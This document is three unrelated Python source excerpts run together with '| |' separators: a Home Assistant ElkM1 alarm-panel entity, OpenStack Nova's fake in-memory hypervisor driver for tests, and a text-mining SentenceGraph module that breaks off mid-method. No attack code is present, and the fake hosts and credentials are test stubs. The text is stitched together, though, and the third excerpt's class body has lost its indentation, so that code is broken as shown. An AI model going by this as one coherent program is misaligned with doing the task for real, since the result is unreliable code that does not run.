class ElkArea(ElkAttachedEntity, AlarmControlPanelEntity, RestoreEntity):
    """Representation of an Area / Partition within the ElkM1 alarm panel."""

    def __init__(self, element, elk, elk_data):
        """Initialize Area as Alarm Control Panel."""
        super().__init__(element, elk, elk_data)
        self._elk = elk
        # "Changed by" attribution; filled in by the keypad / area-log
        # callbacks below and restored from the last saved HA state on
        # startup (the panel does not report it on resync).
        self._changed_by_keypad = None
        self._changed_by_time = None
        self._changed_by_id = None
        self._changed_by = None
        self._state = None

    async def async_added_to_hass(self):
        """Register callback for ElkM1 changes."""
        await super().async_added_to_hass()
        # Only watch keypads on single-area panels; _watch_keypad also
        # filters on the keypad's area, so this avoids redundant callbacks.
        if len(self._elk.areas.elements) == 1:
            for keypad in self._elk.keypads:
                keypad.add_callback(self._watch_keypad)
        self._element.add_callback(self._watch_area)
        # We do not get changed_by back from resync.
        last_state = await self.async_get_last_state()
        if not last_state:
            return
        # Restore each attribute independently — older saved states may be
        # missing some of them.
        if ATTR_CHANGED_BY_KEYPAD in last_state.attributes:
            self._changed_by_keypad = last_state.attributes[ATTR_CHANGED_BY_KEYPAD]
        if ATTR_CHANGED_BY_TIME in last_state.attributes:
            self._changed_by_time = last_state.attributes[ATTR_CHANGED_BY_TIME]
        if ATTR_CHANGED_BY_ID in last_state.attributes:
            self._changed_by_id = last_state.attributes[ATTR_CHANGED_BY_ID]
        if ATTR_CHANGED_BY in last_state.attributes:
            self._changed_by = last_state.attributes[ATTR_CHANGED_BY]

    def _watch_keypad(self, keypad, changeset):
        # Record who last used a keypad belonging to this area.
        if keypad.area != self._element.index:
            return
        if changeset.get("last_user") is not None:
            self._changed_by_keypad = keypad.name
            self._changed_by_time = keypad.last_user_time.isoformat()
            # last_user is converted to a 1-based id here; _watch_area's
            # user_number follows the same 1-based convention (note the
            # matching "- 1" when resolving the username there).
            self._changed_by_id = keypad.last_user + 1
            self._changed_by = username(self._elk, keypad.last_user)
            self.async_write_ha_state()

    def _watch_area(self, area, changeset):
        # Attribute arm/disarm changes from the panel's own event log.
        last_log = changeset.get("last_log")
        if not last_log:
            return
        # user_number only set for arm/disarm logs
        if not last_log.get("user_number"):
            return
        # Log-based attribution has no keypad; clear any stale keypad name.
        self._changed_by_keypad = None
        self._changed_by_id = last_log["user_number"]
        self._changed_by = username(self._elk, self._changed_by_id - 1)
        self._changed_by_time = last_log["timestamp"]
        self.async_write_ha_state()

    @property
    def code_format(self):
        """Return the alarm code format."""
        return FORMAT_NUMBER

    @property
    def state(self):
        """Return the state of the element."""
        return self._state

    @property
    def supported_features(self) -> int:
        """Return the list of supported features."""
        return SUPPORT_ALARM_ARM_HOME | SUPPORT_ALARM_ARM_AWAY | SUPPORT_ALARM_ARM_NIGHT

    @property
    def device_state_attributes(self):
        """Attributes of the area."""
        attrs = self.initial_attrs()
        elmt = self._element
        attrs["is_exit"] = elmt.is_exit
        attrs["timer1"] = elmt.timer1
        attrs["timer2"] = elmt.timer2
        # Expose the raw Elk statuses by their enum names (lower-cased)
        # when the panel has reported them.
        if elmt.armed_status is not None:
            attrs["armed_status"] = ArmedStatus(elmt.armed_status).name.lower()
        if elmt.arm_up_state is not None:
            attrs["arm_up_state"] = ArmUpState(elmt.arm_up_state).name.lower()
        if elmt.alarm_state is not None:
            attrs["alarm_state"] = AlarmState(elmt.alarm_state).name.lower()
        attrs[ATTR_CHANGED_BY_KEYPAD] = self._changed_by_keypad
        attrs[ATTR_CHANGED_BY_TIME] = self._changed_by_time
        attrs[ATTR_CHANGED_BY_ID] = self._changed_by_id
        return attrs

    @property
    def changed_by(self):
        """Last change triggered by."""
        return self._changed_by

    def _element_changed(self, element, changeset):
        # Map Elk armed statuses onto HA alarm states.  Instant/vacation
        # variants collapse onto the closest HA state.
        elk_state_to_hass_state = {
            ArmedStatus.DISARMED.value: STATE_ALARM_DISARMED,
            ArmedStatus.ARMED_AWAY.value: STATE_ALARM_ARMED_AWAY,
            ArmedStatus.ARMED_STAY.value: STATE_ALARM_ARMED_HOME,
            ArmedStatus.ARMED_STAY_INSTANT.value: STATE_ALARM_ARMED_HOME,
            ArmedStatus.ARMED_TO_NIGHT.value: STATE_ALARM_ARMED_NIGHT,
            ArmedStatus.ARMED_TO_NIGHT_INSTANT.value: STATE_ALARM_ARMED_NIGHT,
            ArmedStatus.ARMED_TO_VACATION.value: STATE_ALARM_ARMED_AWAY,
        }
        # Precedence: unknown < triggered < arming/pending < armed status.
        if self._element.alarm_state is None:
            self._state = None
        elif self._area_is_in_alarm_state():
            self._state = STATE_ALARM_TRIGGERED
        elif self._entry_exit_timer_is_running():
            self._state = (
                STATE_ALARM_ARMING if self._element.is_exit else STATE_ALARM_PENDING
            )
        else:
            # NOTE(review): an armed_status value missing from the map above
            # would raise KeyError here — confirm the map covers every
            # ArmedStatus value elkm1_lib can report.
            self._state = elk_state_to_hass_state[self._element.armed_status]

    def _entry_exit_timer_is_running(self):
        # Either timer non-zero means an entry or exit countdown is active.
        return self._element.timer1 > 0 or self._element.timer2 > 0

    def _area_is_in_alarm_state(self):
        # Everything from FIRE_ALARM upward counts as an active alarm.
        return self._element.alarm_state >= AlarmState.FIRE_ALARM.value

    async def async_alarm_disarm(self, code=None):
        """Send disarm command."""
        # NOTE(review): int(code) raises if code is None; presumably HA
        # always supplies a code given code_format — confirm.
        self._element.disarm(int(code))

    async def async_alarm_arm_home(self, code=None):
        """Send arm home command."""
        self._element.arm(ArmLevel.ARMED_STAY.value, int(code))

    async def async_alarm_arm_away(self, code=None):
        """Send arm away command."""
        self._element.arm(ArmLevel.ARMED_AWAY.value, int(code))

    async def async_alarm_arm_night(self, code=None):
        """Send arm night command."""
        self._element.arm(ArmLevel.ARMED_NIGHT.value, int(code))

    async def async_alarm_arm_home_instant(self, code=None):
        """Send arm stay instant command."""
        self._element.arm(ArmLevel.ARMED_STAY_INSTANT.value, int(code))

    async def async_alarm_arm_night_instant(self, code=None):
        """Send arm night instant command."""
        self._element.arm(ArmLevel.ARMED_NIGHT_INSTANT.value, int(code))

    async def async_alarm_arm_vacation(self, code=None):
        """Send arm vacation command."""
        self._element.arm(ArmLevel.ARMED_VACATION.value, int(code))

    async def async_display_message(self, clear, beep, timeout, line1, line2):
        """Display a message on all keypads for the area."""
        self._element.display_message(clear, beep, timeout, line1, line2)

    async def async_bypass(self, code=None):
        """Bypass all zones in area."""
        # NOTE(review): unlike the arm/disarm handlers above, code is passed
        # through without int() coercion — verify elkm1_lib accepts a string.
        self._element.bypass(code)

    async def async_clear_bypass(self, code=None):
        """Clear bypass for all zones in area."""
        self._element.clear_bypass(code)
| |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A fake (in-memory) hypervisor+api.
Allows nova testing w/o a hypervisor. This module also documents the
semantics of real hypervisor connections.
"""
import contextlib
from oslo_config import cfg
from oslo_serialization import jsonutils
from nova.compute import arch
from nova.compute import hv_type
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova.console import type as ctype
from nova import db
from nova import exception
from nova.i18n import _LW
from nova.openstack.common import log as logging
from nova import utils
from nova.virt import diagnostics
from nova.virt import driver
from nova.virt import hardware
from nova.virt import virtapi
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
LOG = logging.getLogger(__name__)
_FAKE_NODES = None
def set_nodes(nodes):
    """Replace FakeDriver's node list with *nodes*.

    Affects get_available_nodes() and get_available_resource().
    Call restore_nodes() afterwards to undo the change.
    """
    global _FAKE_NODES
    _FAKE_NODES = nodes
def restore_nodes():
    """Reset the fake node list to the default (just the local host).

    Undoes a previous set_nodes() call; usually invoked from tearDown().
    """
    global _FAKE_NODES
    _FAKE_NODES = [CONF.host]
class FakeInstance(object):
    """Lightweight stand-in for an instance record.

    Supports both attribute access (inst.name) and dict-style access
    (inst['name']); the latter is routed through getattr.
    """

    def __init__(self, name, state, uuid):
        self.name, self.state, self.uuid = name, state, uuid

    def __getitem__(self, key):
        # Dict-style lookup delegates to the attribute of the same name.
        return getattr(self, key)
# In-memory "hypervisor": instances live only in self.instances, and most
# driver operations are no-ops that simply satisfy the ComputeDriver API.
class FakeDriver(driver.ComputeDriver):
    capabilities = {
        "has_imagecache": True,
        "supports_recreate": True,
        }

    # Since we don't have a real hypervisor, pretend we have lots of
    # disk and ram so this driver can be used to test large instances.
    vcpus = 1000
    memory_mb = 800000
    local_gb = 600000

    """Fake hypervisor driver."""
    # NOTE(review): the string above follows other statements, so it is a
    # no-op expression rather than the class docstring.

    def __init__(self, virtapi, read_only=False):
        super(FakeDriver, self).__init__(virtapi)
        # name -> FakeInstance for everything "spawned" on this driver.
        self.instances = {}
        # Template host stats returned (copied) by get_available_resource().
        self.host_status_base = {
            'vcpus': self.vcpus,
            'memory_mb': self.memory_mb,
            'local_gb': self.local_gb,
            'vcpus_used': 0,
            'memory_mb_used': 0,
            'local_gb_used': 100000000000,
            'hypervisor_type': 'fake',
            'hypervisor_version': utils.convert_version_to_int('1.0'),
            'hypervisor_hostname': CONF.host,
            'cpu_info': {},
            'disk_available_least': 0,
            'supported_instances': jsonutils.dumps([(arch.X86_64,
                                                     hv_type.FAKE,
                                                     vm_mode.HVM)]),
            'numa_topology': None,
            }
        # instance name -> {mountpoint: connection_info} for fake volumes.
        self._mounts = {}
        # vif id -> vif for fake attached interfaces.
        self._interfaces = {}
        if not _FAKE_NODES:
            set_nodes([CONF.host])

    def init_host(self, host):
        return

    def list_instances(self):
        return self.instances.keys()

    def list_instance_uuids(self):
        return [self.instances[name].uuid for name in self.instances.keys()]

    def plug_vifs(self, instance, network_info):
        """Plug VIFs into networks."""
        pass

    def unplug_vifs(self, instance, network_info):
        """Unplug VIFs from networks."""
        pass

    def spawn(self, context, instance, image_meta, injected_files,
              admin_password, network_info=None, block_device_info=None,
              flavor=None):
        # "Boot" simply records a RUNNING FakeInstance under its name.
        name = instance['name']
        state = power_state.RUNNING
        fake_instance = FakeInstance(name, state, instance['uuid'])
        self.instances[name] = fake_instance

    def snapshot(self, context, instance, name, update_task_state):
        if instance['name'] not in self.instances:
            raise exception.InstanceNotRunning(instance_id=instance['uuid'])
        # Advance the task state as a real driver would during upload.
        update_task_state(task_state=task_states.IMAGE_UPLOADING)

    def reboot(self, context, instance, network_info, reboot_type,
               block_device_info=None, bad_volumes_callback=None):
        pass

    @staticmethod
    def get_host_ip_addr():
        return '192.168.0.1'

    def set_admin_password(self, instance, new_pass):
        pass

    def inject_file(self, instance, b64_path, b64_contents):
        pass

    def resume_state_on_host_boot(self, context, instance, network_info,
                                  block_device_info=None):
        pass

    def rescue(self, context, instance, network_info, image_meta,
               rescue_password):
        pass

    def unrescue(self, instance, network_info):
        pass

    def poll_rebooting_instances(self, timeout, instances):
        pass

    def migrate_disk_and_power_off(self, context, instance, dest,
                                   flavor, network_info,
                                   block_device_info=None,
                                   timeout=0, retry_interval=0):
        pass

    def finish_revert_migration(self, context, instance, network_info,
                                block_device_info=None, power_on=True):
        pass

    def post_live_migration_at_destination(self, context, instance,
                                           network_info,
                                           block_migration=False,
                                           block_device_info=None):
        pass

    def power_off(self, instance, shutdown_timeout=0, shutdown_attempts=0):
        pass

    def power_on(self, context, instance, network_info, block_device_info):
        pass

    def soft_delete(self, instance):
        pass

    def restore(self, instance):
        pass

    def pause(self, instance):
        pass

    def unpause(self, instance):
        pass

    def suspend(self, instance):
        pass

    def resume(self, context, instance, network_info, block_device_info=None):
        pass

    def destroy(self, context, instance, network_info, block_device_info=None,
                destroy_disks=True, migrate_data=None):
        # Remove the fake instance; destroying an unknown instance is only
        # logged, not raised, mirroring best-effort teardown semantics.
        key = instance['name']
        if key in self.instances:
            del self.instances[key]
        else:
            LOG.warning(_LW("Key '%(key)s' not in instances '%(inst)s'"),
                        {'key': key,
                         'inst': self.instances}, instance=instance)

    def cleanup(self, context, instance, network_info, block_device_info=None,
                destroy_disks=True, migrate_data=None, destroy_vifs=True):
        pass

    def attach_volume(self, context, connection_info, instance, mountpoint,
                      disk_bus=None, device_type=None, encryption=None):
        """Attach the disk to the instance at mountpoint using info."""
        instance_name = instance['name']
        if instance_name not in self._mounts:
            self._mounts[instance_name] = {}
        self._mounts[instance_name][mountpoint] = connection_info

    def detach_volume(self, connection_info, instance, mountpoint,
                      encryption=None):
        """Detach the disk attached to the instance."""
        try:
            del self._mounts[instance['name']][mountpoint]
        except KeyError:
            # Detaching a volume that was never attached is a no-op.
            pass

    def swap_volume(self, old_connection_info, new_connection_info,
                    instance, mountpoint, resize_to):
        """Replace the disk attached to the instance."""
        instance_name = instance['name']
        if instance_name not in self._mounts:
            self._mounts[instance_name] = {}
        self._mounts[instance_name][mountpoint] = new_connection_info

    def attach_interface(self, instance, image_meta, vif):
        # Attaching the same vif id twice is an error, as on a real driver.
        if vif['id'] in self._interfaces:
            raise exception.InterfaceAttachFailed(
                    instance_uuid=instance['uuid'])
        self._interfaces[vif['id']] = vif

    def detach_interface(self, instance, vif):
        try:
            del self._interfaces[vif['id']]
        except KeyError:
            raise exception.InterfaceDetachFailed(
                    instance_uuid=instance['uuid'])

    def get_info(self, instance):
        if instance['name'] not in self.instances:
            raise exception.InstanceNotFound(instance_id=instance['name'])
        i = self.instances[instance['name']]
        # Only the power state is tracked; the resource numbers are canned.
        return hardware.InstanceInfo(state=i.state,
                                     max_mem_kb=0,
                                     mem_kb=0,
                                     num_cpu=2,
                                     cpu_time_ns=0)

    def get_diagnostics(self, instance_name):
        # Canned diagnostics in the legacy (flat-dict) format.
        return {'cpu0_time': 17300000000,
                'memory': 524288,
                'vda_errors': -1,
                'vda_read': 262144,
                'vda_read_req': 112,
                'vda_write': 5778432,
                'vda_write_req': 488,
                'vnet1_rx': 2070139,
                'vnet1_rx_drop': 0,
                'vnet1_rx_errors': 0,
                'vnet1_rx_packets': 26701,
                'vnet1_tx': 140208,
                'vnet1_tx_drop': 0,
                'vnet1_tx_errors': 0,
                'vnet1_tx_packets': 662,
                }

    def get_instance_diagnostics(self, instance_name):
        # Same canned numbers as get_diagnostics, in the structured
        # Diagnostics-object format.
        diags = diagnostics.Diagnostics(state='running', driver='fake',
                hypervisor_os='fake-os', uptime=46664, config_drive=True)
        diags.add_cpu(time=17300000000)
        diags.add_nic(mac_address='01:23:45:67:89:ab',
                      rx_packets=26701,
                      rx_octets=2070139,
                      tx_octets=140208,
                      tx_packets = 662)
        diags.add_disk(id='fake-disk-id',
                       read_bytes=262144,
                       read_requests=112,
                       write_bytes=5778432,
                       write_requests=488)
        diags.memory_details.maximum = 524288
        return diags

    def get_all_bw_counters(self, instances):
        """Return bandwidth usage counters for each interface on each
           running VM.
        """
        bw = []
        return bw

    def get_all_volume_usage(self, context, compute_host_bdms):
        """Return usage info for volumes attached to vms on
           a given host.
        """
        volusage = []
        return volusage

    def get_host_cpu_stats(self):
        # Python 2 long literals; nanosecond-scale canned counters.
        stats = {'kernel': 5664160000000L,
                 'idle': 1592705190000000L,
                 'user': 26728850000000L,
                 'iowait': 6121490000000L}
        stats['frequency'] = 800
        return stats

    def block_stats(self, instance_name, disk_id):
        return [0L, 0L, 0L, 0L, None]

    def get_console_output(self, context, instance):
        return 'FAKE CONSOLE OUTPUT\nANOTHER\nLAST LINE'

    def get_vnc_console(self, context, instance):
        return ctype.ConsoleVNC(internal_access_path='FAKE',
                                host='fakevncconsole.com',
                                port=6969)

    def get_spice_console(self, context, instance):
        return ctype.ConsoleSpice(internal_access_path='FAKE',
                                  host='fakespiceconsole.com',
                                  port=6969,
                                  tlsPort=6970)

    def get_rdp_console(self, context, instance):
        return ctype.ConsoleRDP(internal_access_path='FAKE',
                                host='fakerdpconsole.com',
                                port=6969)

    def get_serial_console(self, context, instance):
        return ctype.ConsoleSerial(internal_access_path='FAKE',
                                   host='fakerdpconsole.com',
                                   port=6969)

    def get_console_pool_info(self, console_type):
        return {'address': '127.0.0.1',
                'username': 'fakeuser',
                'password': 'fakepassword'}

    def refresh_security_group_rules(self, security_group_id):
        return True

    def refresh_security_group_members(self, security_group_id):
        return True

    def refresh_instance_security_rules(self, instance):
        return True

    def refresh_provider_fw_rules(self):
        pass

    def get_available_resource(self, nodename):
        """Updates compute manager resource info on ComputeNode table.

           Since we don't have a real hypervisor, pretend we have lots of
           disk and ram.
        """
        # Unknown nodes report no resources at all.
        if nodename not in _FAKE_NODES:
            return {}
        host_status = self.host_status_base.copy()
        host_status['hypervisor_hostname'] = nodename
        host_status['host_hostname'] = nodename
        host_status['host_name_label'] = nodename
        host_status['cpu_info'] = '?'
        return host_status

    def ensure_filtering_rules_for_instance(self, instance_ref, network_info):
        return

    def get_instance_disk_info(self, instance, block_device_info=None):
        return

    def live_migration(self, context, instance_ref, dest,
                       post_method, recover_method, block_migration=False,
                       migrate_data=None):
        # Migration always "succeeds" immediately: invoke the post hook.
        post_method(context, instance_ref, dest, block_migration,
                    migrate_data)
        return

    def check_can_live_migrate_destination_cleanup(self, ctxt,
                                                   dest_check_data):
        return

    def check_can_live_migrate_destination(self, ctxt, instance_ref,
                                           src_compute_info, dst_compute_info,
                                           block_migration=False,
                                           disk_over_commit=False):
        return {}

    def check_can_live_migrate_source(self, ctxt, instance_ref,
                                      dest_check_data, block_device_info=None):
        return

    def finish_migration(self, context, migration, instance, disk_info,
                         network_info, image_meta, resize_instance,
                         block_device_info=None, power_on=True):
        return

    def confirm_migration(self, migration, instance, network_info):
        return

    def pre_live_migration(self, context, instance_ref, block_device_info,
                           network_info, disk, migrate_data=None):
        return

    def unfilter_instance(self, instance_ref, network_info):
        return

    def test_remove_vm(self, instance_name):
        """Removes the named VM, as if it crashed. For testing."""
        # KeyError on unknown names is intentional — test helpers should
        # fail loudly.
        self.instances.pop(instance_name)

    def host_power_action(self, action):
        """Reboots, shuts down or powers up the host."""
        return action

    def host_maintenance_mode(self, host, mode):
        """Start/Stop host maintenance window. On start, it triggers
           guest VMs evacuation.
        """
        if not mode:
            return 'off_maintenance'
        return 'on_maintenance'

    def set_host_enabled(self, enabled):
        """Sets the specified host's ability to accept new instances."""
        if enabled:
            return 'enabled'
        return 'disabled'

    def get_volume_connector(self, instance):
        return {'ip': CONF.my_block_storage_ip,
                'initiator': 'fake',
                'host': 'fakehost'}

    def get_available_nodes(self, refresh=False):
        # Module-level list managed via set_nodes()/restore_nodes().
        return _FAKE_NODES

    def instance_on_disk(self, instance):
        return False

    def quiesce(self, context, instance, image_meta):
        pass

    def unquiesce(self, context, instance, image_meta):
        pass
class FakeVirtAPI(virtapi.VirtAPI):
    """Minimal VirtAPI used with the fake driver."""

    def provider_fw_rule_get_all(self, context):
        # Straight pass-through to the database layer.
        return db.provider_fw_rule_get_all(context)

    @contextlib.contextmanager
    def wait_for_instance_event(self, instance, event_names, deadline=300,
                                error_callback=None):
        # NOTE(danms): Don't actually wait for any events, just
        # fall through
        yield
class SmallFakeDriver(FakeDriver):
    """FakeDriver variant with the small resource sizes the API samples use."""

    # The api samples expect specific cpu memory and disk sizes. In order to
    # allow the FakeVirt driver to be used outside of the unit tests, provide
    # a separate class that has the values expected by the api samples. So
    # instead of requiring new samples every time those
    # values are adjusted allow them to be overwritten here.
    vcpus = 1
    memory_mb = 8192
    local_gb = 1028
| |
"""
Main class for representing a sentence
"""
__version__ = "$Revision: 1.40 $"
#import Graph.networkx_v10rc1 as NX10 # import networkx as NX
from SimpleGraph import Graph
import sys, os
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/..")
import Utils.Range as Range
import types
import copy
#multiedges = True
def loadCorpus(corpus, parse, tokenization=None, removeNameInfo=False, removeIntersentenceInteractionsFromCorpusElements=True):
    """
    Load an entire corpus through CorpusElements and add SentenceGraph-objects
    to its SentenceElements-objects.

    @param corpus: a file name or an already-parsed interaction-XML object
    @param parse: name of the parse to use
    @param tokenization: name of the tokenization to use (None = default)
    @return: the CorpusElements object, with a sentenceGraph attribute set
        on every sentence (None for sentences with no tokens/dependencies)
    """
    # Local imports keep this heavy machinery out of module import time.
    import Utils.ElementTreeUtils as ETUtils
    import sys
    from Utils.ProgressCounter import ProgressCounter
    from Utils.InteractionXML.CorpusElements import CorpusElements
    # Corpus may be in file or not
    if type(corpus) == types.StringType:
        print >> sys.stderr, "Loading corpus file", corpus
    corpusTree = ETUtils.ETFromObj(corpus)
    corpusRoot = corpusTree.getroot()
    # Use CorpusElements-class to access xml-tree
    corpusElements = CorpusElements(corpusRoot, parse, tokenization, tree=corpusTree, removeNameInfo=removeNameInfo, removeIntersentenceInteractions=removeIntersentenceInteractionsFromCorpusElements)
    print >> sys.stderr, str(len(corpusElements.documentsById)) + " documents, " + str(len(corpusElements.sentencesById)) + " sentences"
    # Make sentence graphs
    duplicateInteractionEdgesRemoved = 0
    sentences = []
    counter = ProgressCounter(len(corpusElements.sentences), "Make sentence graphs")
    counter.showMilliseconds = True
    # Iterate over a copy: sentences could in principle be removed (see the
    # commented-out removal below).
    for sentence in corpusElements.sentences[:]:
        counter.update(1, "Making sentence graphs ("+sentence.sentence.get("id")+"): ")
        # No tokens, no sentence. No also no dependencies = no sentence.
        # Let's not remove them though, so that we don't lose sentences from input.
        if len(sentence.tokens) == 0 or len(sentence.dependencies) == 0:
            #corpusElements.sentences.remove(sentence)
            sentence.sentenceGraph = None
            continue
        for pair in sentence.pairs:
            # gif-xml defines two closely related element types, interactions and
            # pairs. Pairs are like interactions, but they can also be negative (if
            # interaction-attribute == False). Sometimes pair-elements have been
            # (incorrectly) used without this attribute. To work around these issues
            # we take all pair-elements that define interaction and add them to
            # the interaction-element list.
            isInteraction = pair.get("interaction")
            if isInteraction == "True" or isInteraction == None:
                sentence.interactions.append(pair) # add to interaction-elements
                if pair.get("type") == None: # type-attribute must be explicitly defined
                    pair.set("type", "undefined")
        # Construct the basic SentenceGraph (only syntactic information)
        graph = SentenceGraph(sentence.sentence, sentence.tokens, sentence.dependencies)
        # Add semantic information, i.e. the interactions
        graph.mapInteractions(sentence.entities, sentence.interactions)
        graph.interSentenceInteractions = sentence.interSentenceInteractions
        duplicateInteractionEdgesRemoved += graph.duplicateInteractionEdgesRemoved
        sentence.sentenceGraph = graph
        graph.parseElement = sentence.parseElement
        #graph.mapEntityHints()
    print >> sys.stderr, "Skipped", duplicateInteractionEdgesRemoved, "duplicate interaction edges in SentenceGraphs"
    return corpusElements
def getCorpusIterator(input, output, parse, tokenization=None, removeNameInfo=False, removeIntersentenceInteractions=True):
    """
    Iterate over a corpus document by document, yielding for each document
    the list of its SentenceElements (each with a sentenceGraph attribute,
    None when the sentence has no tokens or no dependencies).

    If *output* is not None, the (possibly modified) XML is streamed to it
    as the iteration proceeds.
    """
    import Utils.ElementTreeUtils as ETUtils
    from Utils.InteractionXML.SentenceElements import SentenceElements
    #import xml.etree.cElementTree as ElementTree
    if output != None:
        etWriter = ETUtils.ETWriter(output)
    # The iterator yields (event, element) tuples for start/end events.
    for eTuple in ETUtils.ETIteratorFromObj(input, ("start", "end")):
        element = eTuple[1]
        if eTuple[0] in ["end", "memory"] and element.tag == "document":
            # A complete document has been read: build graphs for all of
            # its sentences, yield them, then write the document out.
            sentences = []
            for sentenceElement in element.findall("sentence"):
                #print ElementTree.tostring(sentenceElement)
                sentence = SentenceElements(sentenceElement, parse, tokenization, removeIntersentenceInteractions=removeIntersentenceInteractions)
                if len(sentence.tokens) == 0 or len(sentence.dependencies) == 0:
                    sentence.sentenceGraph = None
                else:
                    # Construct the basic SentenceGraph (only syntactic information)
                    graph = SentenceGraph(sentence.sentence, sentence.tokens, sentence.dependencies)
                    # Add semantic information, i.e. the interactions
                    graph.mapInteractions(sentence.entities, sentence.interactions)
                    graph.interSentenceInteractions = sentence.interSentenceInteractions
                    #duplicateInteractionEdgesRemoved += graph.duplicateInteractionEdgesRemoved
                    sentence.sentenceGraph = graph
                    graph.parseElement = sentence.parseElement
                sentences.append(sentence)
            yield sentences
            if output != None:
                etWriter.write(element)
        elif element.tag == "corpus" and output != None:
            # Open/close the corpus wrapper element around the documents.
            if eTuple[0] == "start":
                etWriter.begin(element)
            else:
                etWriter.end(element)
        if eTuple[0] == "end" and element.tag in ["document", "corpus"]:
            # Free the processed subtree to keep memory usage bounded.
            element.clear()
    if output != None:
        etWriter.close()
class SentenceGraph:
"""
The main purpose of SentenceGraph is to connect the syntactic dependency
parse (a graph where dependencies are edges and tokens are nodes) to the
semantic interactions (which form a graph where interactions are edges
and entities are nodes). Additionally, SentenceGraph provides several
dictionaries that e.g. map element ids to their corresponding elements.
"""
def __init__(self, sentenceElement, tokenElements, dependencyElements):
"""
Creates the syntactic graph part of the SentenceGraph. The semantic graph
can be added with mapInteractions.
@param sentenceElement: interaction-XML sentence-element
@type sentenceElement: cElementTree.Element
@param tokenElements: interaction-XML syntactic token elements
@type tokenElements: list of cElementTree.Element objects
@param dependencyElements: interacton-XML syntactic dependency elements
@type dependencyElements: list of cElementTree.Element objects
"""
self.sentenceElement = sentenceElement
self.tokens = tokenElements
self.dependencies = dependencyElements
#self.dependencyGraph = NX.XDiGraph(multiedges = multiedges)
#if multiedges:
# self.dependencyGraph = NX10.MultiDiGraph()
#else:
# self.dependencyGraph = NX10.DiGraph()
self.dependencyGraph = Graph()
self.interactions = None
self.entities = None
self.interactionGraph = None
self.entityGraph = None
self.duplicateInteractionEdgesRemoved = 0
self.tokenHeadScores = None
# Merged graph
self.mergedEntities = None
self.mergedEntityToDuplicates = None
self.mergedEntityGraph = None
self.tokensById = {}
for token in self.tokens:
self.tokensById[token.get("id")] = token
#self.dependencyGraph.add_node(token)
self.dependencyGraph.addNodes(self.tokens)
# Build the dependency graph using token-elements as nodes and dependency-elements
# as edge data
for dependency in self.dependencies:
#self.dependencyGraph.add_edge(self.tokensById[dependency.attrib["t1"]],\
self.dependencyGraph.addEdge(self.tokensById[dependency.get("t1")],\
self.tokensById[dependency.get("t2")],\
dependency)
# element=dependency)
# def getUndirectedDependencyGraph(self):
# """
# Create an undirected version of the syntactic dependency graph.
# """
# u = NX10.MultiGraph()
# for token in self.tokens:
# u.add_node(token)
# for dependency in self.dependencies:
# u.add_edge(self.tokensById[dependency.attrib["t1"]],\
# self.tokensById[dependency.attrib["t2"]], element=dependency)
# u.add_edge(self.tokensById[dependency.attrib["t2"]],\
# self.tokensById[dependency.attrib["t1"]], element=dependency)
# return u
    def getSentenceId(self):
        # Id attribute of the interaction-XML sentence element this graph
        # was built from.
        return self.sentenceElement.get("id")
    def makeEntityGraph(self, entities, interactions, entityToDuplicates=None):
        """
        Build a semantic graph with entities as nodes and interactions as
        edge data, optionally collapsing duplicate entities.

        @param entities: entity elements to use as graph nodes
        @param interactions: interaction elements to use as edges
        @param entityToDuplicates: optional map from a primary entity to its
            duplicate entities; edges of a duplicate are attached to the
            primary node, and same-typed duplicate edges are dropped.
        """
        graph = Graph()
        graph.addNodes(entities)
        # make a dummy duplicate map if it's not required
        if entityToDuplicates == None:
            entityToDuplicates = {}
            for e in entities:
                entityToDuplicates[e] = []
        # initialize a helper map: e1 -> e2 -> [interactions from e1 to e2]
        interactionMap = {}
        for interaction in interactions:
            e1 = self.entitiesById[interaction.get("e1")]
            e2Id = interaction.get("e2")
            if e2Id not in self.entitiesById: # intersentence interaction
                # The target is outside this sentence; use the bare id string
                # as a placeholder node so the edge is still represented.
                if e2Id not in entities:
                    entities.append(e2Id)
                    entityToDuplicates[e2Id] = []
                e2 = e2Id # make a dummy node
            else:
                e2 = self.entitiesById[e2Id]
            if e1 not in interactionMap:
                interactionMap[e1] = {}
            if e2 not in interactionMap[e1]:
                interactionMap[e1][e2] = []
            interactionMap[e1][e2].append(interaction)
        # make the graph
        for e1 in entities: # loop through all given entities
            for e2 in entities: # loop through all given entities
                interactionTypes = set()
                for d1 in [e1] + entityToDuplicates[e1]: # add duplicates to each iteration
                    for d2 in [e2] + entityToDuplicates[e2]: # add duplicates to each iteration
                        if d1 in interactionMap and d2 in interactionMap[d1]:
                            for interaction in interactionMap[d1][d2]:
                                if interaction.get("type") not in interactionTypes: # remove edges with the same type that another edge already had
                                    graph.addEdge(e1, e2, interaction) # add primary and duplicate edges for the main entity pair
                                    interactionTypes.add(interaction.get("type"))
        return graph
    # TODO: This method shouldn't be needed anymore
    def getInteractions(self, entity1, entity2, merged=False):
        """
        Return a list of interaction-elements which represent directed
        interactions from entity1 to entity2.

        @param entity1: a semantic node (trigger or named entity)
        @type entity1: cElementTree.Element
        @param entity2: a semantic node (trigger or named entity)
        @type entity2: cElementTree.Element
        @param merged: if True, look edges up in the merged entity graph
            (duplicate entities collapsed), building it lazily if needed.
        """
        if merged:
            # Note: mergeInteractionGraph must be called before
            if self.mergedEntityToDuplicates == None:
                self.mergeInteractionGraph(True)
            if self.mergedEntityGraph == None:
                # Build the merged entity graph on first use and cache it.
                self.mergedEntityGraph = self.makeEntityGraph(self.mergedEntities, self.interactions, self.mergedEntityToDuplicates)
            return self.mergedEntityGraph.getEdges(entity1, entity2)
        else:
            if self.entityGraph == None:
                # Build the plain entity graph on first use and cache it.
                self.entityGraph = self.makeEntityGraph(self.entities, self.interactions)
            return self.entityGraph.getEdges(entity1, entity2)
def getOutInteractions(self, entity, merged=False):
if merged:
# Note: mergeInteractionGraph must be called before
#assert self.mergedEntityToDuplicates != None
if self.mergedEntityToDuplicates == None:
self.mergeInteractionGraph(True)
